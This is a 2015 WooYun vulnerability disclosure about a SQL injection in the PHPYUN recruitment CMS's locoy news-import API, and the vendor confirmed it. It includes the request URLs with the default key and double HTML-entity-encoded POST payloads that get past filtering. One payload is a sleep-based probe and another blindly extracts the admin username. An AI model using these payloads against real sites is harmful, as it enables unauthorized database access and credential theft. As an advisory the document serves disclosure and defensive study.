PHPYUN无视GPC(可注入全站信息)

漏洞概要

缺陷编号:WooYun-2015-0127257

漏洞标题:PHPYUN无视GPC(可注入全站信息)

相关厂商:php云人才系统

漏洞作者:menmen519

提交时间:2015-07-20 10:59

公开时间:2015-10-21 21:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-07-26: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

PHPYUN无视GPC(可注入全站信息)180个字符的注入,等于没有限制,什么都能注入出来

详细说明:

首先我们看这个文件:api/locoy/model/news.class.php:

这个里面有几个条件要说明一下:1.$locoyinfo['locoy_key']!=trim($_GET['key'])我们搜索一下:locoy_config.php里面 默认安装的话,就是$locoyinfo=array("locoy_online"=>"1","locoy_name"=>"yun_","locoy_pwd"=>"12345678","locoy_key"=>"phpyun","co找来找去都没有发现设置更改这个配置的地方,在后台的添加新闻的地方也没有找到,不管这个配置是硬编码的还是怎么样,反正是默认配置条件2:$row=$this->obj->DB_select_once("news_base","title='".trim($_POST['title'])."' and nid='".$_POST['nid']."'");if(is_array($row)){echo 3;die;}这个语句必须查不到,也就是说数据库里面不存在这个新闻条件3 if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){ 这个逻辑不要进来,不然就会报错然后我们看看问题点:

发现了没有我们只要对数据进行实体编码即可所有的空格都会被去掉,那么我们比如sleep(5)可以写成slee p(5)解码后有180个字符的范围,那么我们就可以什么都能注射出来url:http://localhost/phpyun40/upload/api/locoy/index.php?m=news&c=addnews&key=phpyunpostdata:title=xxxx&content=1'*slee p(5)#&nid=567&keyword=xxxxxx编码一层:title=xxxx&content=1'*slee p(5)#&nid=567&keyword=xxxxxx再编码一层:title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2335%3B&nid=567&keyword=xxxxxx这样发送url:http://localhost/phpyun40/upload/api/locoy/index.php?m=news&c=addnews&key=phpyunpostdata:title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2335%3B&nid=567&keyword=xxxxxx后台抓取sql为:INSERT INTO phpyun_news_base SET title='xxxx',nid='567',did='0',author='',description='1'*sleep(5)#',source='',datetime='1437052963',hits='',sort='',keyword='xxxxxx'

后续进行猜测的,180个字符随便来,记得里面的nid每次请求一次都要变一次在所有的关键字里面都加一个空格postdata:title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23105%3B%26%2332%3B%26%23102%3B%26%2340%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23105%3B%26%23105%3B%26%2340%3B%26%23115%3B%26%23117%3B%26%2398%3B%26%23115%3B%26%23116%3B%26%23114%3B%26%2340%3B%26%2340%3B%26%23115%3B%26%23101%3B%26%23108%3B%26%23101%3B%26%2332%3B%26%2399%3B%26%23116%3B%26%2396%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%23110%3B%26%2397%3B%26%23109%3B%26%23101%3B%26%2396%3B%26%23102%3B%26%23114%3B%26%2332%3B%26%23111%3B%26%23109%3B%26%2396%3B%26%23112%3B%26%23104%3B%26%23112%3B%26%23121%3B%26%23117%3B%26%23110%3B%26%2395%3B%26%2397%3B%26%23100%3B%26%23109%3B%26%23105%3B%26%23110%3B%26%2395%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%2396%3B%26%2341%3B%26%2344%3B%26%2349%3B%26%2344%3B%26%2349%3B%26%2341%3B%26%2341%3B%26%2361%3B%26%2357%3B%26%2355%3B%26%2344%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2344%3B%26%2349%3B%26%2341%3B%26%2335%3B&nid=5671&keyword=xxxxxx抓取sql为:INSERT INTO phpyun_news_base SET title='xxxx',nid='5671',did='0',author='',description='1'*if(ascii(substr((selectusernamefromphpyun_admin_user),1,1))=97,sleep(5),1)#',source='',datetime='1437053421',hits='',sort='',keyword='xxxxxx'

漏洞证明:

修复方案:

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-2321:17

厂商回复:

感谢提供,我们会尽快修复!

最新状态:

暂无

评价

  1. 2010-01-01 00:00 牛肉包子 白帽子 | Rank:190 漏洞数:17)

    为啥没提醒

  2. 2010-01-01 00:00 Ton7BrEak 白帽子 | Rank:128 漏洞数:8)

    mark

  3. 2010-01-01 00:00 从容 白帽子 | Rank:153 漏洞数:21)

    为啥说开源更安全?因为乌云。。。